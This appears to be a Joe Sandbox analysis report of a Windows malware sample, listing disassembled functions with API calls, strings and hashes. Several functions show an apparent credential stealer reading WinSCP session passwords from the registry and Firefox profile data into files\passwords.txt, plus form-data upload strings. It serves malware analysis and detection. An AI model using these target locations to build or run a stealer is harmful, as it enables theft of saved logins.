Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: ByteCharFileFindMultiWide$FirstH_prolog3_Next
String ID:
API String ID: 1519118924-0
Opcode ID: d8814cccdc2aa9d43cb3a6b34ffc8b449f61f91fc0a7d6e73554e0f3f7806989
Instruction ID: eee4268402d3be2adbf6474e7a6ed5a58b1e6a0c497219df7d07a097969d48a9
Opcode Fuzzy Hash: d8814cccdc2aa9d43cb3a6b34ffc8b449f61f91fc0a7d6e73554e0f3f7806989
Instruction Fuzzy Hash: 3C313E71D00248DFCB11DFA9C888AEEBBB8AF55305F00809FE419A7251DB789748CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0040A13F Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040A160
GetVersionExA.KERNEL32(?), ref: 0040A179

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Version_memset
String ID:
API String ID: 963298953-0
Opcode ID: 92c6c7d1c88c4438c45fcaaff6dca32db23cf35e2d50acd69a050b2bdc8d5ce6
Instruction ID: 7d99f63c99c76fffc2ec752f588ee917e90982fb7ee752c21fb7e3a2838b08db
Opcode Fuzzy Hash: 92c6c7d1c88c4438c45fcaaff6dca32db23cf35e2d50acd69a050b2bdc8d5ce6
Instruction Fuzzy Hash: 92F05471A501189EEB14DF74EC46FAD73B89B09705F5005BDA60ED72C2DE74AA8C8F05

Uniqueness

Uniqueness Score: -1.00%

Function 00450776 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 004507AB

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 43c8b0defdef598358849066e36153adae69c49a03c9a9ff7b9ac4858f9ac6f2
Instruction ID: e4389bfb8606ea9e40d1286e25dbc3938175838c475b0bec7b0a6831d7fc3ba0
Opcode Fuzzy Hash: 43c8b0defdef598358849066e36153adae69c49a03c9a9ff7b9ac4858f9ac6f2
Instruction Fuzzy Hash: B4F0FF71500258CBEB30DFA8DC45BDDB7F8BB04309F50851EE499E7241DFB865488BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004274F9 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0048CF60,00000000,00433F01,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,00000001,00000000), ref: 00427509

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: c503b2a448b0bf811e0bc8364418a8f66476d399e48f05f931dc1958b4bf519a
Instruction ID: 086aef4f4125fd986cca82d13d43af3b3cc5048f47f24e1c3b410bd2694c028b
Opcode Fuzzy Hash: c503b2a448b0bf811e0bc8364418a8f66476d399e48f05f931dc1958b4bf519a
Instruction Fuzzy Hash: 28C0123339C2056BF60876A9BC86F7B1293C7C5F20F74C83BB204891D5EA6544C2431D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D83B Relevance: 75.4, APIs: 50, Instructions: 410memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040D854

Part of subcall function 0040C174: __EH_prolog3_GS.LIBCMT ref: 0040C17B

GetProcessHeap.KERNEL32(00000008,?,0000002C), ref: 0040D8C0
HeapAlloc.KERNEL32(00000000), ref: 0040D8C3
GetProcessHeap.KERNEL32(00000000,?), ref: 0040D8D9
HeapFree.KERNEL32(00000000), ref: 0040D8DC
_strcpy_s.LIBCMT ref: 0040D91E
GetProcessHeap.KERNEL32(00000000,?), ref: 0040D935
HeapFree.KERNEL32(00000000), ref: 0040D938
GetProcessHeap.KERNEL32(00000000,?), ref: 0040D962
HeapFree.KERNEL32(00000000), ref: 0040D965
GetProcessHeap.KERNEL32(00000008,?), ref: 0040D96C
HeapAlloc.KERNEL32(00000000), ref: 0040D96F
GetProcessHeap.KERNEL32(00000000,?), ref: 0040D985
HeapFree.KERNEL32(00000000), ref: 0040D988
_strcpy_s.LIBCMT ref: 0040D9B1
GetProcessHeap.KERNEL32(00000000,?), ref: 0040D9C2
HeapFree.KERNEL32(00000000), ref: 0040D9C5
GetProcessHeap.KERNEL32(00000000,?), ref: 0040D9E4
HeapFree.KERNEL32(00000000), ref: 0040D9E7
GetProcessHeap.KERNEL32(00000008,?), ref: 0040D9EE
HeapAlloc.KERNEL32(00000000), ref: 0040D9F1
_strcpy_s.LIBCMT ref: 0040DA09
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DA1A
HeapFree.KERNEL32(00000000), ref: 0040DA1D
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DA43
HeapFree.KERNEL32(00000000), ref: 0040DA46
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DA4D
HeapAlloc.KERNEL32(00000000), ref: 0040DA50
_strcpy_s.LIBCMT ref: 0040DA68
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DA79
HeapFree.KERNEL32(00000000), ref: 0040DA7C
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DA97
HeapAlloc.KERNEL32(00000000), ref: 0040DA9A
_strcpy_s.LIBCMT ref: 0040DAFA
GetProcessHeap.KERNEL32(00000000,00000010,00000001,00000000,00000001,00000000,?,?,?), ref: 0040DB20
HeapFree.KERNEL32(00000000), ref: 0040DB23
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DB3B
HeapAlloc.KERNEL32(00000000), ref: 0040DB3E
_strcpy_s.LIBCMT ref: 0040DB56
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DB62
HeapFree.KERNEL32(00000000), ref: 0040DB65
GetProcessHeap.KERNEL32(00000000,00000010), ref: 0040DB8C
HeapFree.KERNEL32(00000000), ref: 0040DB8F
GetProcessHeap.KERNEL32(00000008,?), ref: 0040DB96
HeapAlloc.KERNEL32(00000000), ref: 0040DB99
_strcpy_s.LIBCMT ref: 0040DBB1
GetProcessHeap.KERNEL32(00000000,?), ref: 0040DBC2
GetProcessHeap.KERNEL32(00000000,00000010), ref: 0040DC5F
HeapFree.KERNEL32(00000000), ref: 0040DC62
HeapFree.KERNEL32(00000000), ref: 0040DBC5

Part of subcall function 00404147: _memmove.LIBCMT ref: 00404169

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Alloc_strcpy_s$_memmove$H_prolog3H_prolog3_
String ID:
API String ID: 264996938-0
Opcode ID: 00d6528fda5d3f4f60b7dbe04c84db529c0ad6458249eeef1deb52451c1131d0
Instruction ID: 0590bf65914a2f700f534404ac8f6d164e89f0a45ad79be350c59ce8c9c338ee
Opcode Fuzzy Hash: 00d6528fda5d3f4f60b7dbe04c84db529c0ad6458249eeef1deb52451c1131d0
Instruction Fuzzy Hash: 4EE107B1D0021AAECF11EFE5CC859EEBBB9FF18304F10042AF515B6291DB799948CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCB5 Relevance: 73.8, APIs: 27, Strings: 15, Instructions: 298registryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040DCD4
_memset.LIBCMT ref: 0040DCF4
_memset.LIBCMT ref: 0040DD14
_memset.LIBCMT ref: 0040DD28
_memset.LIBCMT ref: 0040DD36
RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DD62
RegGetValueW.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040DD84
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 0040DD96
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 0040DDAC
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 0040DDBD
RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040DDD3
RegEnumKeyExA.ADVAPI32 ref: 0040DDF0
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 0040DE06
_fprintf.LIBCMT ref: 0040DE60
_fprintf.LIBCMT ref: 0040DE6B
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,?,00000001,00000000,files\passwords.txt), ref: 0040DE90
_fprintf.LIBCMT ref: 0040DE9F
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?,?,?,?,00000001,00000000,files\passwords.txt), ref: 0040DECB
_fprintf.LIBCMT ref: 0040DEEF
_fprintf.LIBCMT ref: 0040DF0A
_fprintf.LIBCMT ref: 0040DF17
RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?,?,?,?,?,00000001,00000000,files\passwords.txt), ref: 0040DF3B
_fprintf.LIBCMT ref: 0040DF4A
RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0040DF7C

Part of subcall function 0040D83B: __EH_prolog3.LIBCMT ref: 0040D854
Part of subcall function 0040D83B: GetProcessHeap.KERNEL32(00000008,?,0000002C), ref: 0040D8C0
Part of subcall function 0040D83B: HeapAlloc.KERNEL32(00000000), ref: 0040D8C3
Part of subcall function 0040D83B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040D8D9
Part of subcall function 0040D83B: HeapFree.KERNEL32(00000000), ref: 0040D8DC

Part of subcall function 00404147: _memmove.LIBCMT ref: 00404169

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

_fprintf.LIBCMT ref: 0040DFC7
RegEnumKeyExA.ADVAPI32 ref: 0040DFEE
RegCloseKey.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,00000001,00000000,files\passwords.txt), ref: 0040E01B

Strings

:%s, xrefs: 0040DEE9
files\passwords.txt, xrefs: 0040DE13
PortNumber, xrefs: 0040DEB5
HostName, xrefs: 0040DE81
Host: , xrefs: 0040DE65
Security, xrefs: 0040DD7C
Password, xrefs: 0040DF6A
UseMasterPassword, xrefs: 0040DD77
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040DDCD
:22, xrefs: 0040DF04
Login: , xrefs: 0040DF11
Soft: WinSCP, xrefs: 0040DE5A
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040DD57
UserName, xrefs: 0040DF2C
Password: %s, xrefs: 0040DFC1

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _fprintf$CloseValue$Heap_memset$EnumH_prolog3OpenProcess_memmove$AllocFree
String ID: Login: $Password: %s$:%s$:22$Host: $HostName$Password$PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$files\passwords.txt
API String ID: 2505226420-4260070081
Opcode ID: 4cfb8e616cbcc4187313d6e47410dab675fbfd0120b5e60a350e7c057544a82c
Instruction ID: eb75cd75e056ca717821d6679b1228bcc930afad74ee42dd39b704dabc30786c
Opcode Fuzzy Hash: 4cfb8e616cbcc4187313d6e47410dab675fbfd0120b5e60a350e7c057544a82c
Instruction Fuzzy Hash: E8B11DB180024DEEDB15DFA0CC81EFE77BCFB04744F10442BFA19A6191DB799A488B65

Uniqueness

Uniqueness Score: -1.00%

Function 0040C548 Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 264libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0040C579
GetProcAddress.KERNEL32(00000000), ref: 0040C59A
GetProcAddress.KERNEL32(00000000), ref: 0040C5A8
GetProcAddress.KERNEL32(00000000), ref: 0040C5B6
GetProcAddress.KERNEL32(00000000), ref: 0040C5C4
GetProcAddress.KERNEL32(00000000), ref: 0040C5D2
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000,00000001,00000000,files\passwords.txt), ref: 0040C6E1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0040C712
_fprintf.LIBCMT ref: 0040C723
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0040C740
_fprintf.LIBCMT ref: 0040C74E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0040C76E
_fprintf.LIBCMT ref: 0040C77F
_fprintf.LIBCMT ref: 0040C7AF
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0040C7D0
_fprintf.LIBCMT ref: 0040C7E1
FreeLibrary.KERNEL32(00000000), ref: 0040C83F

Strings

Login: %s, xrefs: 0040C777
Password: %s, xrefs: 0040C7D9
files\passwords.txt, xrefs: 0040C657
Password: , xrefs: 0040C7A7
Host: %s, xrefs: 0040C746
Soft: %s, xrefs: 0040C71B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: AddressByteCharMultiProcWide_fprintf$Library$FreeLoad
String ID: Host: %s$Login: %s$Password: $Password: %s$Soft: %s$files\passwords.txt
API String ID: 559029228-409606659
Opcode ID: 26690c3b8019390df6b7f327e186778b13b74cfabef83762b854f7e08cff4e0e
Instruction ID: 56b0eb4a30487df05924cffc6c0fc83fa28608d2d374a9a54033033e413ae9e2
Opcode Fuzzy Hash: 26690c3b8019390df6b7f327e186778b13b74cfabef83762b854f7e08cff4e0e
Instruction Fuzzy Hash: 589149B2800208EFDB24AFA5DC84DAE7BBDFB08714F14453EE915A72A1E7359944CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0045EF8B Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0045C5A7), ref: 0045EF93
__mtterm.LIBCMT ref: 0045EF9F

Part of subcall function 0045ECD8: DecodePointer.KERNEL32(00000005,0045F101,?,0045C5A7), ref: 0045ECE9
Part of subcall function 0045ECD8: TlsFree.KERNEL32(0000001B,0045F101,?,0045C5A7), ref: 0045ED03
Part of subcall function 0045ECD8: DeleteCriticalSection.KERNEL32(00000000,00000000,773DF3A0,?,0045F101,?,0045C5A7), ref: 00462B2C
Part of subcall function 0045ECD8: _free.LIBCMT ref: 00462B2F
Part of subcall function 0045ECD8: DeleteCriticalSection.KERNEL32(0000001B,773DF3A0,?,0045F101,?,0045C5A7), ref: 00462B56

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0045EFB5
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0045EFC2
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0045EFCF
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0045EFDC
TlsAlloc.KERNEL32(?,0045C5A7), ref: 0045F02C
TlsSetValue.KERNEL32(00000000,?,0045C5A7), ref: 0045F047
__init_pointers.LIBCMT ref: 0045F051
EncodePointer.KERNEL32(?,0045C5A7), ref: 0045F062
EncodePointer.KERNEL32(?,0045C5A7), ref: 0045F06F
EncodePointer.KERNEL32(?,0045C5A7), ref: 0045F07C
EncodePointer.KERNEL32(?,0045C5A7), ref: 0045F089
DecodePointer.KERNEL32(0045EE5C,?,0045C5A7), ref: 0045F0AA
__calloc_crt.LIBCMT ref: 0045F0BF
DecodePointer.KERNEL32(00000000,?,0045C5A7), ref: 0045F0D9
GetCurrentThreadId.KERNEL32 ref: 0045F0EB

Strings

FlsSetValue, xrefs: 0045EFC4
FlsGetValue, xrefs: 0045EFB7
KERNEL32.DLL, xrefs: 0045EF8E
FlsAlloc, xrefs: 0045EFAF
FlsFree, xrefs: 0045EFD1

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: feda50f0edeca5d26bd26cd6452b7bcf514d125a2415c19591bd279e377a96f1
Instruction ID: 8d2a2d10b2338a2b311c4433308989e964fb6e029a33e1fdbc18d9634ec59ffc
Opcode Fuzzy Hash: feda50f0edeca5d26bd26cd6452b7bcf514d125a2415c19591bd279e377a96f1
Instruction Fuzzy Hash: DB31A2318103119AD7217BB5BC8961E3FA4AB4076571449BFEC24D32F2DB788449DF6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C85C Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 245libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0040C88D
GetProcAddress.KERNEL32(00000000), ref: 0040C8AE
GetProcAddress.KERNEL32(00000000), ref: 0040C8BC
GetProcAddress.KERNEL32(00000000), ref: 0040C8CA
GetProcAddress.KERNEL32(00000000), ref: 0040C8D8
GetProcAddress.KERNEL32(00000000), ref: 0040C8E6
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000,00000001,00000000,files\passwords.txt), ref: 0040C9F5
_fprintf.LIBCMT ref: 0040CA06
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0040CA23
_fprintf.LIBCMT ref: 0040CA31
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0040CA51
_fprintf.LIBCMT ref: 0040CA62
_fprintf.LIBCMT ref: 0040CA93
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0040CAB4
_fprintf.LIBCMT ref: 0040CAC5
FreeLibrary.KERNEL32(00000000), ref: 0040CB23

Strings

Login: %s, xrefs: 0040CA5A
Password: %s, xrefs: 0040CABD
files\passwords.txt, xrefs: 0040C96B
Password: , xrefs: 0040CA8B
Host: %s, xrefs: 0040CA29
Soft: %s, xrefs: 0040C9FE

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: AddressProc_fprintf$ByteCharMultiWide$Library$FreeLoad
String ID: Host: %s$Login: %s$Password: $Password: %s$Soft: %s$files\passwords.txt
API String ID: 1561987134-409606659
Opcode ID: 065be0bbcfc6ec137915e72aaed1eb6f53948ecc31f7c80747ac9ee6fe5f7eb1
Instruction ID: 7d015237433afc2ab488e8ac593d2873861914295aef02f2e0398cca5112c322
Opcode Fuzzy Hash: 065be0bbcfc6ec137915e72aaed1eb6f53948ecc31f7c80747ac9ee6fe5f7eb1
Instruction Fuzzy Hash: F28127B2900208EFDB24DFA5DC85DAE7BB9FB08314F14053EE919A72A1E7359944CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC36 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 330windowCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,92B5BC2D), ref: 0040CC8D
__snprintf.LIBCMT ref: 0040CCA3
GetPrivateProfileSectionNamesA.KERNEL32 ref: 0040CCB5
_fprintf.LIBCMT ref: 0040CDBA
_fprintf.LIBCMT ref: 0040CDC8
_fprintf.LIBCMT ref: 0040CDDA
MessageBoxA.USER32 ref: 0040CDF3
_fseek.LIBCMT ref: 0040CE52
_fseek.LIBCMT ref: 0040CE62
__fread_nolock.LIBCMT ref: 0040CE78
_fprintf.LIBCMT ref: 0040CF34
_fprintf.LIBCMT ref: 0040CF42
_fprintf.LIBCMT ref: 0040CF8E
_fprintf.LIBCMT ref: 0040CFDA

Strings

FIREFOX PASS, xrefs: 0040CDE3
Soft: %s, xrefs: 0040CDB4, 0040CF2C
Login: %s, xrefs: 0040CDD4, 0040CF86
files\passwords.txt, xrefs: 0040CD26, 0040CE82
Host: %s, xrefs: 0040CDC2, 0040CF3A
Password: %s, xrefs: 0040CFD2

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _fprintf$_fseek$FolderMessageNamesPathPrivateProfileSection__fread_nolock__snprintf
String ID: Soft: %s$FIREFOX PASS$Host: %s$Login: %s$Password: %s$files\passwords.txt
API String ID: 2808057060-590722923
Opcode ID: bb3bad4cf68dd0975be416989a0dea524514d6f27d60672c49f48f9535f01686
Instruction ID: bbce10aa5154a33a7843be78a5af4a749833221b900bc948db0e2d376a99ebc0
Opcode Fuzzy Hash: bb3bad4cf68dd0975be416989a0dea524514d6f27d60672c49f48f9535f01686
Instruction Fuzzy Hash: 27B1D371800249EFDB24AFA1DC45DEE77A9EF04708F00492EFA05B71D2DB799D0987A9

Uniqueness

Uniqueness Score: -1.00%

Function 004099B2 Relevance: 35.2, APIs: 6, Strings: 14, Instructions: 196fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004099B9
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0000006C,00407A96,logs,?), ref: 004099DC
GetFileSize.KERNEL32(00000000,00000000), ref: 004099F0
CloseHandle.KERNEL32(?), ref: 00409A01

Strings

Content-Type: , xrefs: 00409B6C
png, xrefs: 00409ACF
tiff, xrefs: 00409AE9
jpg, xrefs: 00409A94
image/jpeg, xrefs: 00409AAE
Content-Disposition: form-data; name=", xrefs: 00409B2A
"; filename=", xrefs: 00409B40
image/gif, xrefs: 00409AC8
image/tiff, xrefs: 00409AF9
image/png, xrefs: 00409AE2
DbG, xrefs: 00409B1D
", xrefs: 00409B60
., xrefs: 00409A7A
gif, xrefs: 00409AB5

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: File$CloseCreateH_prolog3_HandleSize
String ID: "$"; filename="$.$Content-Disposition: form-data; name="$Content-Type: $DbG$gif$image/gif$image/jpeg$image/png$image/tiff$jpg$png$tiff
API String ID: 3151384386-365509100
Opcode ID: 41439ebd9b85d304271e76bf850c3ecba1595b9b7b1bfc0cea91702287265e34
Instruction ID: 20fe81f626790eeadaf93d6c33c874fb26c3dc185739062e6acf0046ca13e9bb
Opcode Fuzzy Hash: 41439ebd9b85d304271e76bf850c3ecba1595b9b7b1bfc0cea91702287265e34
Instruction Fuzzy Hash: 6061A570A00604AEDB05EBA5CC82EEEB7BAAF58704F10852FF506B71C2DB785D45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041BD17 Relevance: 33.7, APIs: 7, Strings: 12, Instructions: 481COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041BDEC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041BE26
_strncmp.LIBCMT ref: 0041C0B6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041C156
__allrem.LIBCMT ref: 0041C161
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041C1D0
_strncmp.LIBCMT ref: 0041C248

Strings

minute, xrefs: 0041BF33
start of , xrefs: 0041C242
hour, xrefs: 0041BF0C
year, xrefs: 0041BFE7, 0041C28E
second, xrefs: 0041BF4F
weekday , xrefs: 0041C0B0
localtime, xrefs: 0041C05D
day, xrefs: 0041BEE4, 0041C2B5
utc, xrefs: 0041C1F7
month, xrefs: 0041BF70, 0041C26A
unixepoch, xrefs: 0041C1A5
-, xrefs: 0041BE3E

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$_strncmp$__allrem_memset
String ID: -$day$hour$localtime$minute$month$second$start of $unixepoch$utc$weekday $year
API String ID: 572882295-3507268942
Opcode ID: efc8996be540338d141155bbb76cb98cd5e60fa3aaa4d7781008f3988b364196
Instruction ID: 03b6eff94d1d8a75d164854a80a99b0006aa50fac033385748c84808d47f00f1
Opcode Fuzzy Hash: efc8996be540338d141155bbb76cb98cd5e60fa3aaa4d7781008f3988b364196
Instruction Fuzzy Hash: 15020672D402089BDF149FA5DD817DE7BB4EF45324F2540ABE804AB286E77C8C858B9D

Uniqueness

Uniqueness Score: -1.00%

